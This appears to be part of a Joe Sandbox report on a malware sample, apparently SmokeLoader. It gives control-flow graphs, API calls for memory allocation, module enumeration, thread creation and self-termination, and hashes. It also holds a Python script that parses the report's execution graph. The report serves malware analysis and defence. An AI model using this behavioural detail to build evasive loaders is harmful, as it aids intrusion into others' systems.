                                                                                          • Instruction Fuzzy Hash: 35011A70C0424CEADB10DBE8C5183AEBFB5AF51309F1480D9C4096B242D7B69B98CBA6

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 41 992440-992459 42 99245b-99245d 41->42 43 99245f 42->43 44 992464-992470 CreateToolhelp32Snapshot 42->44 43->44 45 992480-99248d Module32First 44->45 46 992472-992478 44->46 47 99248f-992490 call 9920ff 45->47 48 992496-99249e 45->48 46->45 51 99247a-99247e 46->51 52 992495 47->52 51->42 51->45 52->48
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00992468
                                                                                          • Module32First.KERNEL32(00000000,00000224), ref: 00992488
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0098C000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_98c000_hdeufvw.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3833638111-0
                                                                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction ID: 866812dd9ab3191d4a851ba4d82b0d85acede9c45be7c37b520928bed63552bd
                                                                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                          • Instruction Fuzzy Hash: A5F090366007117FEB303BFDA88DBAE77ECAF49765F100528E646910D0DB70EC458A61

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 54 9920ff-992139 call 992412 57 99213b-99216e VirtualAlloc call 99218c 54->57 58 992187 54->58 60 992173-992185 57->60 58->58 60->58
                                                                                          APIs
                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00992150
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0098C000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_98c000_hdeufvw.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction ID: a60c902bec2031f5742fec4ccefc9cd8706638dc4439341b57e1d52b941d02c2
                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                          • Instruction Fuzzy Hash: 6F113F79A00208FFDB01DF98C985E98BBF5AF08350F058094F9489B362D371EA50DF80

                                                                                          Execution Graph

                                                                                          Execution Coverage:12.6%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:23
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 667 402ad1 668 402ad2 667->668 670 402b56 668->670 671 40180c 668->671 672 40181b 671->672 673 40183e Sleep 672->673 675 401859 673->675 674 40186a NtTerminateProcess 676 401876 674->676 675->674 676->670 685 401818 686 40181b 685->686 687 40183e Sleep 686->687 688 401859 687->688 689 40186a NtTerminateProcess 688->689 690 401876 689->690 691 402a9d 692 402ad2 691->692 693 40180c 2 API calls 692->693 694 402b56 692->694 693->694 677 402bef 678 402cef 677->678 679 402c19 677->679 679->678 679->679 680 402c91 RtlCreateUserThread 679->680 680->678

                                                                                          Callgraph

                                                                                          callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_00402BEF 28 Function_004025EF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                                                                                          • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                          • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
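The report's Execution Graph export and its "APIs" lines are machine text, and the two things an analyst wants from them are reachability (which entry reaches Sleep, NtTerminateProcess or RtlCreateUserThread) and the meaning of the captured arguments. The following is an added example, not part of the Joe Sandbox report and not SmokeLoader code: it parses the graph text and the API lines copied from this page, expands the collapsed "2 API calls" node by address, walks each entry to the APIs it reaches, and ties each `ref:` call site back to the graph block it sits in. All function names are the example's own; the reading of the NtTerminateProcess handle 000000FF as a truncated -1 is an assumption to confirm in the disassembly.

```python
# Added example (not part of the Joe Sandbox report, not SmokeLoader code): rebuild the flattened
# execution_graph export and the "APIs" lines into data, then ask which entry reaches which API
# and what the captured arguments mean.  Function names are this example's own.
import re
from collections import deque

# Copied from the report's "Execution Graph" export.
EXEC_GRAPH = (
    "execution_graph 667 402ad1 668 402ad2 667->668 670 402b56 668->670 671 40180c 668->671 672 40181b "
    "671->672 673 40183e Sleep 672->673 675 401859 673->675 674 40186a NtTerminateProcess 676 401876 "
    "674->676 675->674 676->670 685 401818 686 40181b 685->686 687 40183e Sleep 686->687 688 401859 "
    "687->688 689 40186a NtTerminateProcess 688->689 690 401876 689->690 691 402a9d 692 402ad2 691->692 "
    "693 40180c 2 API calls 692->693 694 402b56 692->694 693->694 677 402bef 678 402cef 677->678 "
    "679 402c19 677->679 679->678 679->679 680 402c91 RtlCreateUserThread 679->680 680->678"
)
# Copied from the report's "APIs" list for the Sleep/NtTerminateProcess function.
API_LINES = ["Sleep.KERNELBASE(00001388), ref: 00401846",
             "NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E"]

NODE_ID_RE = re.compile(r"^\d+$")
ADDR_RE = re.compile(r"^[0-9a-f]{5,8}$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
API_NAME_RE = re.compile(r"^[A-Z][A-Za-z0-9]*$")  # Sleep, NtTerminateProcess, RtlCreateUserThread
COLLAPSED_RE = re.compile(r"^\d+ API calls?$")    # a callee the export drew collapsed
API_LINE_RE = re.compile(r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
NT_CURRENT_PROCESS = 0xFFFFFFFF  # (HANDLE)-1, the pseudo-handle for the calling process

def parse_execution_graph(text):
    """Return (nodes, edges): nodes maps id -> (address, label); edges is a list of (src, dst)."""
    tokens = text.split()
    if not tokens or tokens[0] != "execution_graph":
        raise ValueError("not an execution_graph export")
    nodes, edges, current, i = {}, [], None, 1
    while i < len(tokens):
        tok, edge = tokens[i], EDGE_RE.match(tokens[i])
        if edge:                                   # "a->b"
            edges.append((edge.group(1), edge.group(2)))
            current, i = None, i + 1
        elif NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            nodes[tok] = [tokens[i + 1], []]       # "<id> <address>" opens a node
            current, i = tok, i + 2
        elif current is not None:
            nodes[current][1].append(tok)          # remaining words form the node's label
            i += 1
        else:
            raise ValueError(f"stray token {tok!r} at {i}")
    return {k: (addr, " ".join(words)) for k, (addr, words) in nodes.items()}, edges

def entry_points(nodes, edges):
    """Ids with no incoming edge: the function entries the graph was drawn from."""
    targets = {dst for _, dst in edges}
    return [nid for nid in nodes if nid not in targets]

def apis_reached(nodes, edges):
    """Map entry address -> sorted API names reachable from it; a node labelled 'N API calls'
    is a collapsed callee and is expanded via every other node that carries the same address."""
    succ, by_addr = {}, {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    for nid, (addr, _) in nodes.items():
        by_addr.setdefault(addr, []).append(nid)
    result = {}
    for entry in entry_points(nodes, edges):
        seen, queue, apis = set(), deque([entry]), set()
        while queue:
            nid = queue.popleft()
            if nid in seen:
                continue
            seen.add(nid)
            addr, label = nodes[nid]
            if API_NAME_RE.match(label):
                apis.add(label)
            queue.extend(succ.get(nid, []))
            if COLLAPSED_RE.match(label):
                queue.extend(o for o in by_addr[addr] if o != nid)
        result[nodes[entry][0]] = sorted(apis)
    return result

def call_site_block(ref, nodes):
    """Address of the API node whose block holds the call at 'ref' (greatest API-node address <= ref)."""
    blocks = [int(a, 16) for a, label in nodes.values() if API_NAME_RE.match(label) and int(a, 16) <= ref]
    return max(blocks) if blocks else None

def parse_api_line(line):
    """Parse 'Api.Module(arg,...), ref: addr'; an unrecovered argument '?' becomes None."""
    m = API_LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised API line: {line!r}")
    raw = m.group("args")
    args = [] if not raw else [None if a.strip() == "?" else int(a, 16) for a in raw.split(",")]
    return {"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": int(m.group("ref"), 16)}

def terminate_target(handle):
    """Classify the first NtTerminateProcess argument: 'self', 'self?' or 'other'."""
    if handle == NT_CURRENT_PROCESS:
        return "self"
    if handle == 0xFF:
        # Assumption: the report prints the 8-bit immediate of 'push -1' (6A FF) without sign
        # extension, so 0xFF really is -1.  Confirm in the disassembly at the 'ref' address.
        return "self?"
    return "other"
```

Parsing the export yields 23 nodes, matching the report's "Total number of Nodes:23". Entries 402ad1, 401818 and 402a9d all reach Sleep and NtTerminateProcess (402a9d only after the collapsed 40180c node is expanded), while 402bef reaches only RtlCreateUserThread; the two `ref:` addresses 0x401846 and 0x40186E fall in the 40183e and 40186a blocks respectively. Sleep(00001388) is 5000 ms, and NtTerminateProcess with a -1 handle ends the calling process itself, which is what the sandbox's "Deletes itself after installation" verdict rests on; the 000000FF rendering is flagged rather than silently treated as -1.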

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                                                                                          • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                          • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                                                                                          • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                          • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                                                                                          • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                          • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                          • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProcessSleepTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 417527130-0
                                                                                          • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                                                                                          • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                          • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B

                                                                                           Control-flow Graph

                                                                                           Basic blocks (address range -> successors; API-call block in brackets):
                                                                                           • 402bef-402c13 -> 402c19, 402cef
                                                                                           • 402c19-402c2b -> 402c31, 402cef
                                                                                           • 402c31-402c42 -> 402c44
                                                                                           • 402c44-402c4d -> 402c52
                                                                                           • 402c52-402c60 -> 402c52 (loop), 402c62
                                                                                           • 402c62-402c69 -> 402c72, 402c6b
                                                                                           • 402c6b -> 402c44, 402c6d
                                                                                           • 402c6d-402c70 -> 402c8a
                                                                                           • 402c72-402c88 -> 402c8a
                                                                                           • 402c8a-402c8f -> 402c91, 402cef
                                                                                           • 402c91-402ced [RtlCreateUserThread] -> 402cef
                                                                                           • 402cef-402cf4 (exit)
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1863608485.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_400000_hdeufvw.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThreadUser
                                                                                          • String ID:
                                                                                          • API String ID: 1531140918-0
                                                                                          • Opcode ID: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction ID: 1db3e151d03db0a1b2d88b33ccc958aaf7204f5d63625af9f32895d8f10b8312
                                                                                          • Opcode Fuzzy Hash: 7297fe9666f666a234085e31a7a962aeb3571d674ea4f6f510c8001b8e52953f
                                                                                          • Instruction Fuzzy Hash: D131F631218D098FE798DF1CD889BA273D1F798350F6542AAE809C3395EA74DC5187C6